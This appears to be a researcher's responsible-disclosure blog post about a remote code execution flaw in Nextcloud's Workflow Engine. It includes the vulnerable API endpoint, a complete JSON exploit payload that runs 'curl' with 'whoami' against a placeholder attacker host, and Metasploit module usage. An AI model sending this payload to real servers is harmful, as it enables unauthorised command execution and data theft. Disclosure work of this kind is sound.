Nextcloud Workflows Remote Code Execution

5 min read
Web SecurityNextcloudOS Command Injection
Nextcloud Workflows Remote Code Execution

Introduction

Nextcloud is an open-source platform used by many organizations, including enterprises, universities, and governments, for file synchronization and team collaboration. It is a self-hosted solution. In February 2023, Armend, Arjanit, and I while examining Nextcloud’s automation apps, we identified a critical vulnerability. Any user with a standard account could execute arbitrary commands on the server without requiring administrative privileges.

The issue was a missing validation in the Workflow Engine, allowing regular users to create workflows intended for administrators. Combined with the "External Scripts" app, this led to remote code execution (RCE). We reported this through Nextcloud’s bug bounty program, and it has been resolved.

How It Began

We investigated how Nextcloud manages automated workflows, which activate when events like file creation, renaming, or sharing occur. These workflows can tag files, initiate HTTP requests, or execute shell commands if the appropriate app is enabled.

We focused on the "Workflow External Scripts" app, which allows workflows to run shell commands on the server—a feature meant for administrators only. However, testing revealed that the API did not enforce this restriction.

Nextcloud provides two API endpoints for workflows:

  • /ocs/v2.php/apps/workflowengine/api/v1/workflows/global — for administrator-only workflows
  • /ocs/v2.php/apps/workflowengine/api/v1/workflows/user — for regular users

We asked a simple question: What happens if a normal user uses the /global endpoint to register an operation class that’s meant only for admins?

Turns out: it works.

The Vulnerability

The flaw was a scope validation error in the /user workflows API. Any authenticated user could create a workflow using OCA\WorkflowScript\Operation, a class that permits arbitrary shell command execution. No filters prevented this.

Although the External Scripts app was designed for trusted administrator use, the API allowed any user to create a workflow with it, bypassing restrictions. The file event (e.g., postCreate) triggered the workflow. The core issue was that users could insert unrestricted shell commands.

Exploitation Steps

The process was as follows:

  1. Log in as a non-administrator user.
  2. Ensure the "Workflow External Scripts" app is enabled.
  3. Send a POST request to: 
    POST /ocs/v2.php/apps/workflowengine/api/v1/workflows/user?format=json
  4. Include a JSON payload like this: 
    {
  "id": -1676457965831,
  "class": "OCA\\WorkflowScript\\Operation",
  "entity": "OCA\\WorkflowEngine\\Entity\\File",
  "events": ["\\OCP\\Files::postCreate"],
  "name": "",
  "checks": [{
    "class": "OCA\\WorkflowEngine\\Check\\FileName",
    "operator": "!is",
    "value": "ignore.txt"
  }],
  "operation": "curl https://attacker.site/log?q=`whoami`",
  "valid": true
}

Metasploit Integration

Recently this vulnerability was included in Rapid7’s Metasploit Framework, enabling testing in security assessments. Usage is as follows:

msf > use exploit/unix/webapp/nextcloud_workflows_rce
msf exploit(nextcloud_workflows_rce) > show targets
    ...targets...
msf exploit(nextcloud_workflows_rce) > set TARGET <target-id>
msf exploit(nextcloud_workflows_rce) > show options
    ...set options...
msf exploit(nextcloud_workflows_rce) > exploit

The module handles authentication, workflow injection, and command execution, requiring only a low-privileged user account.

As a team, we thank @whotwagner for contributing to Rapid7 to add this vulnerability as a Metasploit module.

Why This Mattered

This was not a minor issue. It was a logic flaw that allowed low-privileged users to:

  • Create hidden workflows to execute shell commands
  • Maintain persistent server access
  • Run arbitrary payloads, such as reverse shells

The postCreate trigger could be replaced with events like postRename or postShare. The primary issue was allowing regular users to access privileged operations.

Disclosure Timeline

  • February 15, 2023 Vulnerability identified
  • February 16, 2023 Reported via Nextcloud’s bug bounty program
  • February 20, 2023 Nextcloud confirmed the issue
  • March 30, 2023 Validation added to restrict workflow scope

References

Conclusion

Nextcloud assumed user workflows would be limited but failed to enforce this, enabling full RCE from standard accounts. We commend the Nextcloud team for their prompt response and resolution.

For those managing a Nextcloud instance:

  • Review all installed workflow apps
  • Disable or restrict the "External Scripts" app unless essential
  • Ensure the system is updated

Disclosed responsibly through the Nextcloud bug bounty program.